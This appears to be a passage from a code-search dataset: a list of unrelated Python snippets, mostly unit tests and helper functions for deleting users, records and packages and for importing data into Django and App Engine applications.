self.entity.fullyQualifiedName\n ),\n None,\n )", "def test_delete_user_field(self):\n pass", "def test_handle_force_delete(self):\r\n def facade_retrieve_side_effect(*args, **kwargs):\r\n \"\"\"Return a side effect for the mock facade.\"\"\"\r\n if args[0] == Project:\r\n return Project(\"\", [])\r\n elif args[0] == Team:\r\n team = Team(\"GTID\", \"team-name\", \"display-name\")\r\n team.team_leads.add(user)\r\n return team\r\n else:\r\n calling_user = User(user)\r\n return calling_user\r\n self.mock_facade.retrieve.side_effect = facade_retrieve_side_effect\r\n self.assertTupleEqual(\r\n self.testcommand.handle(\"project delete ID -f\",\r\n user),\r\n (\"Project successfully deleted!\", 200))", "def test_get(self):\n objects = self.populate()\n for obj in objects:\n found = models.storage.get(type(obj), obj.id)\n self.assertIs(found, obj)\n for obj in objects:\n obj.delete()\n found = models.storage.get(type(obj), obj.id)\n self.assertIsNone(found)", "async def red_delete_data_for_user(self, **kwargs):\r\n return", "def test_unload(self):\n self.instance.load()\n self.assertIsNotNone(self.instance._author)\n self.instance.unload()\n self.assertIsNone(self.instance._author)", "def test_delete_user(self):\n pass", "def test_delete_user(self):\n pass", "def test_m2m_dependent_object_import(self):\n user_profile: UserProfile = self.user_profiles[0] # See self.setUp()\n\n # ************ First Handle generating the Tags/Images Synthetically Through the Importer ************\n # Initialize Importers\n image_manager = ImporterManager(importer=ImageImporter())\n tag_manager = ImporterManager(importer=TagImporter())\n up_manager = ImporterManager(importer=UserProfileImporter())\n company_manger = ImporterManager(importer=CompanyImporter())\n user_manager = ImporterManager(importer=UserImporter())\n\n # Populate leaf models of dependency tree with kv data\n for row,image in enumerate(self.images):\n user_manager.update_kvs(field_name='username', value=user_profile.user.username, row=row)\n company_manger.update_kvs(field_name='natural_id', value=self.company.natural_id, row=row)\n\n #: Retrieve data associated with kv data\n user_manager.get_available_rows()\n company_manger.get_available_rows()\n\n #: Populate data up the dependency tree with retrieved rows\n for row,image in enumerate(self.images):\n up_manager.update_kvs('company', company_manger.get_object_or_list(row), row=row)\n up_manager.update_kvs('user', user_manager.get_object_or_list(row), row=row)\n\n #: Retrieve data associated with models depended upon\n up_manager.get_available_rows()\n\n tag_manager.update_kvs('slug', 'blue', row=0, col=0)\n tag_manager.update_kvs('slug', 'green', row=0, col=1)\n tag_manager.update_kvs('company', company_manger.get_object_or_list(0), row=0, col=0)\n tag_manager.update_kvs('created_by', up_manager.get_object_or_list(0), row=0, col=0)\n\n tag_manager.update_kvs('slug', 'yellow', row=1, col=0)\n tag_manager.update_kvs('company', company_manger.get_object_or_list(1), row=1, col=0)\n tag_manager.update_kvs('created_by', up_manager.get_object_or_list(1), row=1, col=0)\n\n #: Retrieve associate intermediate data\n tag_manager.get_available_rows()\n\n for row,image in enumerate(self.images):\n image_manager.update_kvs('path', image.path, row=row)\n image_manager.update_kvs('name', image.name, row=row)\n image_manager.update_kvs('tag', tag_manager.get_object_or_list(row), row=row)\n image_manager.update_kvs('company', company_manger.get_object_or_list(row), row=row)\n\n image_manager.get_available_rows()\n\n self.assertNotEqual(image_manager.get_object_or_list(0), [])\n self.assertIsInstance(image_manager.get_object_or_list(0), Image)\n\n self.assertNotEqual(image_manager.get_object_or_list(1), [])\n self.assertIsInstance(image_manager.get_object_or_list(1), Image)", "def test_twice_dependent_object_import(self):\n pass", "def test_import_process(self):\r\n good_file = self._get_del_file()\r\n imp = Importer(good_file, username=u\"admin\")\r\n imp.process()\r\n\r\n # now let's do some db sanity checks\r\n self._delicious_xml_data_test()", "def test_handle_delete_as_admin(self):\r\n def facade_retrieve_side_effect(*args, **kwargs):\r\n \"\"\"Return a side effect for the mock facade.\"\"\"\r\n if args[0] == Project:\r\n return Project(\"\", [])\r\n elif args[0] == Team:\r\n team = Team(\"GTID\", \"team-name\", \"display-name\")\r\n return team\r\n else:\r\n calling_user = User(user)\r\n calling_user.permissions_level = Permissions.admin\r\n return calling_user\r\n self.mock_facade.retrieve.side_effect = facade_retrieve_side_effect\r\n self.assertTupleEqual(\r\n self.testcommand.handle(\"project delete ID\",\r\n user),\r\n (\"Project successfully deleted!\", 200))", "def test_delete_admin_from_org(self):\n pass", "def test_user_id_delete(self):\n pass", "def _objectDeleted(self, obj):\n pass", "def test_data_object_del_all(self):\n pass", "def delete_user():\r\n raise NotImplementedError()", "def delete_object(self, object_type, object_name, user_key = None):\n\t\tobject_key = self._get_key(object_type,user_key)\n\n\t\ttarget_object = None\n\t\tk = 'all_%s' % object_type\n\t\tfor item in self.data[k]:\n\t\t\tif not item.has_key(object_key):\n\t\t\t\tcontinue\n\n\t\t\t## If the object matches, mark it for deletion\n\t\t\tif item[object_key] == object_name:\n\t\t\t\tself.data[k].remove(item)\n\t\t\t\titem['meta']['delete_me'] = True\n\t\t\t\titem['meta']['needs_commit'] = True\n\t\t\t\tself.data[k].append(item)\n\n\t\t\t\t## Commit the delete\n\t\t\t\tself.commit()\n\t\t\t\treturn True\n\n\t\t## Only make it here if the object isn't found\n\t\treturn None", "def test_jenkins_user_delete(self):\n ju = JenkinsUser.objects.get(username=\"user_1\")\n self.assertRaises(django.db.models.deletion.ProtectedError, ju.delete)", "def test_handle_delete_user_lookup_error(self):\r\n def facade_retrieve_side_effect(*args, **kwargs):\r\n \"\"\"Return a side effect for the mock facade.\"\"\"\r\n if args[0] == Project:\r\n return Project(\"\", [])\r\n elif args[0] == Team:\r\n raise LookupError(\"user lookup error\")\r\n else:\r\n calling_user = User(user)\r\n return calling_user\r\n self.mock_facade.retrieve.side_effect = facade_retrieve_side_effect\r\n self.assertTupleEqual(\r\n self.testcommand.handle(\"project delete ID\",\r\n user),\r\n (\"user lookup error\", 200))", "async def red_delete_data_for_user(self, *, requester, user_id):\n return", "async def red_delete_data_for_user(self, *, requester, user_id):\n return", "def test_delete_collection_user(self):\n pass", "def object_import(request, simulation, object_name):\n try:\n if object_name == 'function':\n parent = simulation.scenario.supply.functionset\n else:\n parent = simulation.scenario.supply.network\n query = get_query(object_name, simulation)\n user_id_set = set(query.values_list('user_id', flat=True))\n if object_name == 'link':\n # To import links, we retrieve the user ids of all centroids, crossings\n # and functions and we build mappings between ids and objects.\n centroids = get_query('centroid', simulation)\n centroid_ids = set(centroids.values_list('user_id', flat=True))\n crossings = get_query('crossing', simulation)\n crossing_ids = set(crossings.values_list('user_id', flat=True))\n node_ids = centroid_ids.union(crossing_ids)\n # Mapping between the user id and the id of the nodes.\n node_mapping = dict()\n for centroid in centroids:\n node_mapping[centroid.user_id] = centroid.id\n for crossing in crossings:\n node_mapping[crossing.user_id] = crossing.id\n functions = get_query('function', simulation)\n function_ids = set(functions.values_list('user_id', flat=True))\n # Mapping between the user id and the id of the functions.\n function_id_mapping = dict()\n # Mapping between the user id and the instance of the functions\n function_mapping = dict()\n for function in functions:\n function_id_mapping[function.user_id] = function.id\n function_mapping[function.user_id] = function\n # Convert imported file to a csv DictReader.\n encoded_file = request.FILES['import_file']\n tsv_file = StringIO(encoded_file.read().decode())\n reader = csv.DictReader(tsv_file, delimiter='\\t')\n to_be_updated = set()\n to_be_created = list()\n # Store the user_id of the imported instance to avoid two instances\n # with the same id.\n imported_ids = set()\n if object_name == 'centroid':\n # Do not import centroid with same id as a crossing.\n crossings = get_query('crossing', simulation)\n imported_ids = set(crossings.values_list('user_id', flat=True))\n for row in reader:\n id = int(row['id'])\n if not id in imported_ids:\n imported_ids.add(id)\n if id in user_id_set:\n to_be_updated.add(\n (id, row['name'], float(row['x']),\n float(row['y']))\n )\n else:\n to_be_created.append(\n Centroid(user_id=id, name=row['name'],\n x=float(row['x']), y=float(row['y']))\n )\n elif object_name == 'crossing':\n # Do not import crossing with same id as a centroid.\n centroids = get_query('centroid', simulation)\n imported_ids = set(centroids.values_list('user_id', flat=True))\n for row in reader:\n id = int(row['id'])\n if not id in imported_ids:\n imported_ids.add(id)\n if id in user_id_set:\n to_be_updated.add(\n (id, row['name'], float(row['x']),\n float(row['y']))\n )\n else:\n to_be_created.append(\n Crossing(user_id=id, name=row['name'],\n x=float(row['x']), y=float(row['y']))\n )\n elif object_name == 'function':\n for row in reader:\n id = int(row['id'])\n if not id in imported_ids:\n imported_ids.add(id)\n if id in user_id_set:\n to_be_updated.add(\n (id, row['name'], row['expression'])\n )\n else:\n to_be_created.append(\n Function(user_id=id, name=row['name'],\n expression=row['expression'])\n )\n elif object_name == 'link':\n for row in reader:\n id = int(row['id'])\n if not id in imported_ids:\n imported_ids.add(id)\n if id in user_id_set:\n to_be_updated.add(\n (id, row['name'],\n node_mapping[int(row['origin'])],\n node_mapping[int(row['destination'])],\n function_id_mapping[int(row['function'])],\n float(row['lanes']), float(row['length']),\n float(row['speed']), float(row['capacity']))\n )\n else:\n if int(row['origin']) in node_ids \\\n and int(row['destination']) in node_ids \\\n and int(row['function']) in function_ids:\n # Ignore the links with unidentified origin,\n # destination or function.\n to_be_created.append(\n Link(user_id=id, name=row['name'],\n origin=node_mapping[int(row['origin'])],\n destination=node_mapping[int(row['destination'])],\n vdf=function_mapping[int(row['function'])],\n lanes=float(row['lanes']),\n length=float(row['length']),\n speed=float(row['speed']),\n capacity=float(row['capacity']))\n )\n if to_be_updated:\n if object_name in ('centroid', 'crossing'):\n values = set(query.values_list('user_id', 'name', 'x', 'y'))\n elif object_name == 'function':\n values = set(query.values_list('user_id', 'name', 'expression'))\n elif object_name == 'link':\n values = set(query.values_list('user_id', 'name', 'origin',\n 'destination', 'vdf_id', 'lanes',\n 'length', 'speed', 'capacity'))\n # Find the instances that really need to be updated (the values have\n # changed).\n to_be_updated = to_be_updated.difference(values)\n if object_name in ('centroid', 'crossing', 'function'):\n # Update the objects (it would be faster to delete and re-create\n # them but this would require to also change the foreign keys of\n # the links).\n for values in to_be_updated:\n # Index 0 of values is the id column i.e. the user_id.\n instance = query.filter(user_id=values[0])\n if object_name in ('centroid', 'crossing'):\n instance.update(name=values[1], x=values[2], y=values[3])\n else: # Function\n instance.update(name=values[1], expression=values[2])\n elif object_name == 'link':\n # Delete the links and re-create them.\n ids = list(query.values_list('id', 'user_id'))\n # Create a mapping between the user ids and the ids.\n id_mapping = dict()\n for i in range(len(values)):\n id_mapping[ids[i][1]] = ids[i][0]\n # Retrieve the ids of the links to be updated with the mapping and\n # delete them.\n to_be_updated_ids = [id_mapping[values[0]]\n for values in to_be_updated]\n with connection.cursor() as cursor:\n chunk_size = 20000\n chunks = [\n to_be_updated_ids[x:x + chunk_size]\n for x in range(0, len(to_be_updated_ids), chunk_size)\n ]\n for chunk in chunks:\n # Delete the relations first.\n cursor.execute(\n \"DELETE FROM Network_Link \"\n \"WHERE link_id IN %s;\",\n [chunk]\n )\n cursor.execute(\n \"DELETE FROM Link \"\n \"WHERE id IN %s;\",\n [chunk]\n )\n # Create a mapping between the id and the instance of the\n # functions.\n function_mapping = dict()\n for function in functions:\n function_mapping[function.id] = function\n # Now, create the updated instances with the new values.\n to_be_created += [\n Link(user_id=values[0], name=values[1], origin=values[2],\n destination=values[3], vdf=function_mapping[values[4]],\n lanes=values[5], length=values[6], speed=values[7],\n capacity=values[8])\n for values in to_be_updated\n ]\n # Create the new objects in bulk.\n # The chunk size is limited by the MySQL engine (timeout if it is too big).\n chunk_size = 10000\n chunks = [to_be_created[x:x + chunk_size]\n for x in range(0, len(to_be_created), chunk_size)]\n # Remove the orphan instances.\n if object_name == 'function':\n query.model.objects \\\n .exclude(functionset__in=FunctionSet.objects.all()) \\\n .delete()\n else:\n query.model.objects.exclude(network__in=Network.objects.all()).delete()\n for chunk in chunks:\n # Create the new instances.\n query.model.objects.bulk_create(chunk, chunk_size)\n # Retrieve the newly created instances and add the many-to-many\n # relation.\n # Add the many-to-many relation.\n if object_name == 'function':\n new_instances = query.model.objects \\\n .exclude(functionset__in=FunctionSet.objects.all())\n for instance in new_instances:\n instance.functionset.add(parent)\n else:\n new_instances = query.model.objects \\\n .exclude(network__in=Network.objects.all())\n for instance in new_instances:\n instance.network.add(parent)\n simulation.has_changed = True\n simulation.save()\n return HttpResponseRedirect(\n reverse('metro:object_list', args=(simulation.id, object_name,))\n )\n except Exception as e:\n print(e)\n context = {\n 'simulation': simulation,\n 'object': object_name,\n }\n return render(request, 'metro_app/import_error.html', context)", "def delete_object(self, account, container, object):#opposite to get\n \n pass", "def test_handle_delete_not_admin(self):\n team = Team(\"BRS\", \"brs\", \"web\")\n test_user = User(\"userid\")\n self.db.retrieve.return_value = test_user\n self.db.query.return_value = [team]\n self.assertTupleEqual(self.testcommand.handle(\"team delete brs\", user),\n (self.testcommand.permission_error, 200))\n self.db.delete.assert_not_called()\n self.gh.org_delete_team.assert_not_called()", "def test_delete(self):\n self.assertFalse(self.user1.ad_deleted)\n self.assertTrue(self.user1.active)\n url = '/api/users/{}/'.format(self.user1.ad_guid)\n data = {'Deleted': True}\n response = self.client.put(url, json.dumps(data), content_type='application/json')\n self.assertEqual(response.status_code, 202)\n user = DepartmentUser.objects.get(pk=self.user1.pk) # Refresh from db\n self.assertTrue(user.ad_deleted)\n self.assertFalse(user.active)\n self.assertTrue(user.in_sync)\n # Also delete a second object, to check for silly 'empty string' collisions.\n url = '/api/users/{}/'.format(self.user2.ad_guid)\n response = self.client.put(url, json.dumps(data), content_type='application/json')\n self.assertEqual(response.status_code, 202)", "def test_employe_import_fois2(self):\n self.creer_employe()\n cmd = EmployeCommand()\n cmd.stdout = StringIO()\n cmd.handle('import')\n cmd.handle('import')\n users = User.objects.all()\n self.assertEqual(len(users), 1)", "def test_delete_without_commit_cannot_access(self):\n user = ExampleUserModel(\"foo\", \"[email protected]\")\n user.save()\n user.delete(commit=False)\n with pytest.raises(ObjectDeletedError):\n ExampleUserModel.get_by_id(user.id)", "def test_products_ref_users_user_delete(self):\n pass", "def test_delete_user_identity_mapping(self):\n pass", "def delete(self):\n logger.warning('Deleting a User.information instance is not allowed.')", "def test_delete(self):\n self.request.access.allow_delete = [\"everyone\"]\n pkg = make_package(factory=SQLPackage)\n self.sql.add(pkg)\n transaction.commit()\n self.sql.add(pkg)\n self.db.delete(pkg)\n count = self.sql.query(SQLPackage).count()\n self.assertEqual(count, 0)\n self.storage.delete.assert_called_with(pkg)", "def test_delete_run(self):\n pass", "def _pre_setup(self, *args, **kwargs):\n get_user_model().objects.all().delete()\n super()._pre_setup(*args, **kwargs)", "def delete(self, obj):", "def test_user_is_really_deleted():\n response = api_helper.get_user(user_id=pytest.test_user.id)\n assert response.status_code == 200\n assert len(response.json()['data']) == 0", "def deleteCreatedBy(caller):\n\tCONNECTOR.deleteCreatedBy(caller)", "def delete(self, obj=None):\n pass", "def test_remove_user(self):\n pass", "def test_delete_user_list(mocker, list_type):\n patched_delete_task = mocker.patch(\"search.search_index_helpers.deindex_document\")\n user_list = UserListFactory.create(list_type=list_type)\n deindex_user_list(user_list)\n assert patched_delete_task.called is True\n assert patched_delete_task.call_args[0] == (\n gen_user_list_id(user_list),\n USER_LIST_TYPE,\n )", "def test_del_user(self, api):\n self.builder.add_user(api.get_user())\n resp = api.del_user(api.get_user())\n assert resp.status_code == 204\n with pytest.raises(ObjectDeletedError):\n assert self.builder.check_user(api.get_user()) is False", "def post(self):\n\n login_user = LoginUser.get(self.request.get(\"login_user\", None))\n\n status = memcache.get('import_status')\n if not status:\n logging.critical(\"Failed to retrieve import status from memcache.\")\n self.error(500)\n return\n\n data = memcache.get('import_data')\n if not data:\n logging.critical(\"Failed to retrieve import data from memcache.\")\n self.error(500)\n return\n\n logging.info(\"Retrieved %d bytes for processing. user=%s\" % (len(data),login_user.me.name) )\n memcache.set('import_status', \"Parsing import data.\", time=10)\n\n format=self.request.get(\"format\", None)\n if format == 'JSON':\n dbdump = json.loads(data)\n else:\n dbdump = yaml.load(data)\n\n # purge DB\n logging.info(\"Import task starts deleting data...\")\n contact_entries = db.Query(Contact,keys_only=True)\n contact_entries.filter(\"owned_by =\", login_user)\n count = 0\n delete_contacts = []\n for c in contact_entries:\n # delete all dependent data\n q_t = db.Query(Take2,keys_only=True)\n q_t.filter(\"contact_ref =\", c)\n db.delete(q_t)\n q_i = db.Query(Search,keys_only=True)\n q_i.filter(\"contact_ref =\", c)\n db.delete(q_i)\n count = count +1\n memcache.set('import_status', \"Deleting data: %d deleted.\" % (count), time=3)\n # remember for bulk delete except the one which is the login_user's Person\n if c != login_user.me:\n delete_contacts.append(c)\n db.delete(delete_contacts)\n logging.info(\"Import task deleted %d contact datasets\" % (count))\n\n # dictionary will be filled with a reference to the freshly created person\n # key using the former key as stored in the dbdump. Needed later for resolving\n # the owned by references.\n old_key_to_new_key = {}\n link_to_references = []\n take2_entries = []\n count = 0.0\n for contact in dbdump:\n memcache.set('import_status', \"Importing data: %3.0f%% done.\" % ((count/len(dbdump))*100.0), time=3)\n logging.debug(\"Import type: %s name: %s id: %s attic: %s\" % (contact['type'],\n contact['name'] if 'name' in contact else '<no name>',\n contact['id'] if 'id' in contact else '<no id>',\n contact['attic'] if 'attic' in contact else '<no attic flag>'))\n if contact['type'] == \"person\":\n entry = Person(name=contact['name'])\n if 'lastname' in contact:\n entry.lastname = lastname=contact['lastname']\n if 'birthday' in contact:\n year,month,day = contact['birthday'].split('-')\n entry.birthday = FuzzyDate(day=int(day),month=int(month),year=int(year))\n if 'nickname' in contact:\n entry.nickname = contact['nickname']\n if contact['type'] == \"company\":\n entry = Company(name=contact['name'])\n # importer owns all the data\n entry.owned_by = login_user\n if 'attic' in contact:\n entry.attic = contact['attic']\n if 'timestamp' in contact:\n dt,us= contact['timestamp'].split(\".\")\n entry.timestamp = datetime.datetime.strptime(dt, \"%Y-%m-%dT%H:%M:%S\")\n entry.put()\n # remember the key from the imported file for later dependency resolve\n if 'key' in contact:\n old_key_to_new_key[contact['key']] = entry.key()\n count = count+1\n\n # check for all take2 objects\n for classname in ['email','link','web','address','mobile','other']:\n if classname in contact:\n for m in contact[classname]:\n obj = None\n if classname == 'mobile':\n obj = Mobile(mobile=m['mobile'], contact_ref=entry)\n if classname == 'email':\n obj = Email(email=m['email'], contact_ref=entry)\n if classname == 'web':\n if not m['web'].startswith(\"http://\"):\n m['web'] = 'http://'+m['web']\n obj = Web(web=m['web'], contact_ref=entry)\n if classname == 'other':\n # look for existing tag in DB\n tag = OtherTag.all().filter(\"tag =\", m['what']).get()\n if not tag:\n tag = OtherTag(tag=m['what'])\n tag.put()\n obj = Other(tag=tag, text=m['text'], contact_ref=entry)\n if classname == 'link':\n # save the link_to key from the imported data in the link_to\n # property for rater resolve\n link_to_references.append((entry.key(),m['link_to']))\n if classname == 'address':\n obj = Address(adr=m['adr'], contact_ref=entry)\n if 'location_lat' in m and 'location_lon' in m:\n obj.location = db.GeoPt(lat=float(m['location_lat']),lon=float(m['location_lon']))\n if 'landline_phone' in m:\n obj.landline_phone = m['landline_phone']\n if 'country' in m and m['country'] != \"\":\n country = Country.all().filter(\"country =\", m['country']).get()\n # If country name is not in DB it is added\n if not country:\n country = Country(country=m['country'])\n country.put()\n obj.country = country.key()\n if obj:\n # common fields\n if 'timestamp' in m:\n dt,us= m['timestamp'].split(\".\")\n obj.timestamp = datetime.datetime.strptime(dt, \"%Y-%m-%dT%H:%M:%S\")\n if 'attic' in m:\n obj.attic = m['attic']\n take2_entries.append(obj)\n\n memcache.set('import_status', \"Store dependent entries.\", time=30)\n\n #\n # Resolve (if possible) the reference of the LoginUser to his/her own Person entry\n #\n for t2 in take2_entries:\n if t2.class_name() == \"Email\":\n if t2.email == login_user.user.email():\n # throw away existing login_user Person\n login_user.me.delete()\n login_user.put()\n login_user.me = t2.contact_ref\n login_user.put()\n logging.info(\"Resolved LoginUsers Person: %s using email: %s\" % (t2.contact_ref.name, t2.email))\n\n #\n # Back references to people\n #\n for parent,child_old_key in link_to_references:\n # find child's new key\n key = old_key_to_new_key[child_old_key]\n # update child with back reference\n child = Contact.get(key)\n child.middleman_ref = parent\n child.put()\n\n #\n # Bulk store new entries\n #\n logging.info(\"Import task added %d contacts. Now store their %d dependent datasets\" % (count,len(take2_entries)))\n db.put(take2_entries)\n logging.info(\"Import task done.\")\n # make sure that all indices have to be re-built\n memcache.flush_all()", "def testDeleteUser(self):\n UserAPI().create([(u'test', u'secret', u'name', u'[email protected]')],\n createPrivateNamespace=False)\n self.store.commit()\n with login(u'fluiddb', self.admin.objectID, self.transact) as session:\n yield self.facade.deleteUser(session, u'test')\n\n self.store.rollback()\n self.assertIdentical(None, getUser(u'test'))", "def test_delete_author_logged(self):\n self.client.force_authenticate(user=self.user)\n\n request = self.client.delete(self.epoint)\n self.assertEqual(request.status_code, status.HTTP_204_NO_CONTENT)", "def test_00_cascade(self):\n cat = self.cat\n\n # get the id's of all objects that should be deleted.\n uid = cat.uaccess.id\n orid = self.scratching.id\n arid = self.scratching.raccess.id\n ogid = self.felines.id\n agid = self.felines.gaccess.id\n gpid = UserGroupPrivilege.objects.get(user=cat).id\n rpid = UserResourcePrivilege.objects.get(user=cat).id\n mpid = GroupMembershipRequest.objects.get(request_from=cat).id\n\n # all objects exist before the delete\n self.assertEqual(UserAccess.objects.filter(id=uid).count(), 1)\n self.assertEqual(UserGroupPrivilege.objects.filter(id=gpid).count(), 1)\n self.assertEqual(\n UserResourcePrivilege.objects.filter(\n id=rpid).count(), 1)\n self.assertEqual(\n GroupMembershipRequest.objects.filter(\n id=mpid).count(), 1)\n self.assertEqual(ResourceAccess.objects.filter(id=arid).count(), 1)\n self.assertEqual(GroupAccess.objects.filter(id=agid).count(), 1)\n self.assertEqual(BaseResource.objects.filter(id=orid).count(), 1)\n self.assertEqual(Group.objects.filter(id=ogid).count(), 1)\n\n cat.delete()\n\n # objects tied to the user are deleted, other objects continue to exist\n self.assertEqual(UserAccess.objects.filter(id=uid).count(), 0)\n self.assertEqual(UserGroupPrivilege.objects.filter(id=gpid).count(), 0)\n self.assertEqual(\n UserResourcePrivilege.objects.filter(\n id=rpid).count(), 0)\n self.assertEqual(\n GroupMembershipRequest.objects.filter(\n id=mpid).count(), 0)\n # deleting a user should not remove the groups that user owns\n self.assertEqual(GroupAccess.objects.filter(id=agid).count(), 1)\n self.assertEqual(Group.objects.filter(id=ogid).count(), 1)\n\n # the following tests will fail, because the resource field\n # \"creator\" is a foreign key to User with on_delete=models.CASCADE\n # and null=False. Thus removing the creator of a resource will\n # remove the resource record (and orphan many files in the process).\n\n # print('resource access count is ', ResourceAccess.objects.filter(id=arid).count())\n # print('resource count is ', BaseResource.objects.filter(id=orid).count())\n # self.assertEqual(ResourceAccess.objects.filter(id=arid).count(), 1)\n # self.assertEqual(BaseResource.objects.filter(id=orid).count(), 1)", "def test_deleteorganizations_item(self):\n pass", "def test_delete_item_using_delete(self):\n pass", "def test_import_person(self):\r\n tree = self.person_tree\r\n root = tree.getroot()\r\n assert importer.put_objects(root) == True", "def tearDown(self):\n user = Users.query.first()", "def setUp(self):\r\n\r\n User.query.delete()", "def delete_user():", "def test_export_data_on_existent_user(self) -> None:\n user_data = user_models.LearnerPlaylistModel.export_data(self.USER_ID_1)\n expected_data = {\n 'exploration_ids': self.EXPLORATION_IDS_1,\n 'collection_ids': self.COLLECTION_IDS_1\n }\n self.assertEqual(expected_data, user_data)", "def test_delete_identity(self):\n pass", "def test_handle_delete_as_team_lead(self):\r\n def facade_retrieve_side_effect(*args, **kwargs):\r\n \"\"\"Return a side effect for the mock facade.\"\"\"\r\n if args[0] == Project:\r\n return Project(\"\", [])\r\n elif args[0] == Team:\r\n team = Team(\"GTID\", \"team-name\", \"display-name\")\r\n team.team_leads.add(user)\r\n return team\r\n else:\r\n calling_user = User(user)\r\n return calling_user\r\n self.mock_facade.retrieve.side_effect = facade_retrieve_side_effect\r\n self.assertTupleEqual(\r\n self.testcommand.handle(\"project delete ID\",\r\n user),\r\n (\"Project successfully deleted!\", 200))", "def test_duo_account_delete(self):\n pass", "def test_delete_saved_app_map_search_for_user(self):\n pass", "def test_products_ref_users_delete(self):\n pass", "def test_delete_fail(self):\n self.user_api()\n self.base.metadata.create_all(self.engine)\n people = self.provision_users()\n p = {'id': people[2].id}\n self.delete('user', 403, params=p)", "def test_employe_import(self):\n self.creer_employe()\n cmd = EmployeCommand()\n cmd.stdout = StringIO()\n cmd.handle('import')\n users = User.objects.all()\n self.assertEqual(len(users), 1)\n self.assertEqual(users[0].username, LOGGED_USER_USERNAME,)\n self.assertEqual(users[0].email, LOGGED_USER_EMAIL,)\n self.assertEqual(users[0].first_name, LOGGED_USER_SN,)\n self.assertEqual(users[0].last_name, LOGGED_USER_GN,)", "def test_delete_device_user(self):\n pass", "def tearDown(self) -> None:\n user = storage.get(User, self.user_id)\n if user is not None:\n storage.delete(user)\n city = storage.get(City, self.city_id)\n if city is not None:\n storage.delete(city)\n state = storage.get(State, self.state_id)\n if state is not None:\n storage.delete(state)\n storage.save()", "def tearDown(self) -> None:\n user = storage.get(User, self.user_id)\n if user is not None:\n storage.delete(user)\n city = storage.get(City, self.city_id)\n if city is not None:\n storage.delete(city)\n state = storage.get(State, self.state_id)\n if state is not None:\n storage.delete(state)\n storage.save()", "def test_delete_o_auth_client(self):\n pass", "def delete(self, obj):\n raise NotImplementedError", "def delete_item(self, id: str, user: User) -> bool:", "def test_delete_user(self):\n\n # Delete a user on an empty set\n deleted = self.user_api.delete_user(MAGEN_USER['user_uuid'])\n self.assertTrue(deleted.success) # idempotent request\n\n # Inserting user into Database\n inserted = self.user_api.insert_user(MAGEN_USER)\n self.assertTrue(inserted.success)\n\n # Inserting a client for this user into Database\n inserted = self.client_api.insert_client(MAGEN_CLIENT)\n self.assertTrue(inserted.success)\n\n # Delete user\n deleted = self.user_api.delete_user(MAGEN_USER['user_uuid'])\n self.assertTrue(deleted.success)\n # Verify that user was actually removed\n self.assertIsNone(self.user_api.get_user(MAGEN_USER['user_uuid']).documents)\n # Verify that client was removed with the user\n self.assertIsNone(self.client_api.get_client(MAGEN_CLIENT['mc_id']).documents)", "def test_delete(self):\n self.request.access.allow_delete = [\"everyone\"]\n pkg = make_package(factory=DynamoPackage)\n self._save_pkgs(pkg)\n self.db.delete(pkg)\n count = self.engine.scan(DynamoPackage).count()\n self.assertEqual(count, 0)\n count = self.engine.scan(PackageSummary).count()\n self.assertEqual(count, 0)\n self.storage.delete.assert_called_with(pkg)", "def before_delete(self, obj, st):\n pass", "def tearDown(self):\n self.auth_manager.delete_project('proj1')\n self.auth_manager.delete_project('proj2')\n self.auth_manager.delete_user('user1')\n self.auth_manager.delete_user('user2')\n self.auth_manager.delete_user('admin_user')\n super(ObjectStoreTestCase, self).tearDown()", "def post_delete_access_attempt(self, instance, **kwargs):", "def _delete(self, pk, user=None):\n request = self.factory.delete(self.detail_url(pk), format='json')\n force_authenticate(request, user)\n resp = self.detail_view(request, pk=pk)\n resp.render()\n return resp", "def test_dupe_imports(self):\r\n good_file = self._get_del_file()\r\n imp = Importer(good_file, username=u\"admin\")\r\n imp.process()\r\n\r\n good_file = self._get_del_file()\r\n imp = Importer(good_file, username=u\"admin\")\r\n imp.process()\r\n\r\n # now let's do some db sanity checks\r\n self._delicious_data_test()", "def test_deleting_a_persisted_entity(self, test_domain):\n identifier = uuid4()\n person = test_domain.repository_for(Person)._dao.create(\n id=identifier, first_name=\"Jim\", last_name=\"Carrey\"\n )\n deleted_person = test_domain.repository_for(Person)._dao.delete(person)\n assert deleted_person is not None\n assert deleted_person.state_.is_destroyed is True\n\n with pytest.raises(ObjectNotFoundError):\n test_domain.repository_for(Person)._dao.get(identifier)", "def test_delete_profile(mocker, user):\n patched_delete_task = mocker.patch(\"search.search_index_helpers.deindex_document\")\n deindex_profile(user)\n assert patched_delete_task.called is True\n assert patched_delete_task.call_args[0] == (\n gen_profile_id(user.username),\n PROFILE_TYPE,\n )", "def delete_by(self, user):\n if user.is_superuser or user is self.added_by:\n self.delete()", "def tearDown(self):\n user = SpokeUser(self.org_name)\n user.delete(self.first, self.last)\n org = SpokeOrg()\n org.delete(self.org_name)", "def test_admin_delete_user_taskrun(self):\r\n\r\n with self.flask_app.test_request_context('/'):\r\n user_taskrun = TaskRunFactory.create()\r\n\r\n assert self.mock_admin.id != user_taskrun.user.id\r\n assert_not_raises(Exception,\r\n getattr(require, 'taskrun').delete,\r\n user_taskrun)", "def delete_user(self):\n raise NotImplementedError(\"Function not yet implemented contact package creator\")", "def test_delete(self):\n pass", "def test_delete_data(self):\n data = Data.objects.create(\n name='Test data',\n contributor=self.user,\n process=self.proc,\n )\n\n data.output = {'json_field': {'foo': 'bar'}}\n data.status = Data.STATUS_DONE\n data.save()\n\n self.assertEqual(Storage.objects.count(), 1)\n\n data.delete()\n self.assertEqual(Storage.objects.count(), 0)", "def test_factory_gives_delicious(self):\r\n loc = os.path.dirname(__file__)\r\n del_file = os.path.join(loc, 'delicious.html')\r\n\r\n with open(del_file) as del_io:\r\n imp = Importer(del_io, username=u\"admin\")\r\n\r\n self.assertTrue(\r\n isinstance(imp, DelImporter),\r\n \"Instance should be a delimporter instance\")", "def test_delete_cascade(self):\n\n self.assertEquals(\n Employee.objects.get(cpf=\"974.220.200-16\"),\n self.employee\n )\n\n self.user.delete()\n\n with self.assertRaises(Employee.DoesNotExist):\n Employee.objects.get(cpf=\"974.220.200-16\")", "def setUp(self):\n\n User.query.delete()", "def test_delete_no_username(self):\n\n self.portal.portal_properties.site_properties.use_email_as_login = True\n\n # This should fail either an username or user object should be given\n self.assertRaises(ValueError, api.user.delete)\n self.assertRaises(ValueError, api.user.delete,\n username='[email protected]', user=mock.Mock())\n\n api.user.create(email='[email protected]', password='secret')\n api.user.delete(username='[email protected]')\n\n user = api.user.create(email='[email protected]', password='secret')\n api.user.delete(user=user)", "def delete_user():\n #TODO user delete\n pass", "def test_delete(client):\n rv = delete(client, 'Michael')\n assert json.loads(rv.data.decode())['code'] == 0\n assert 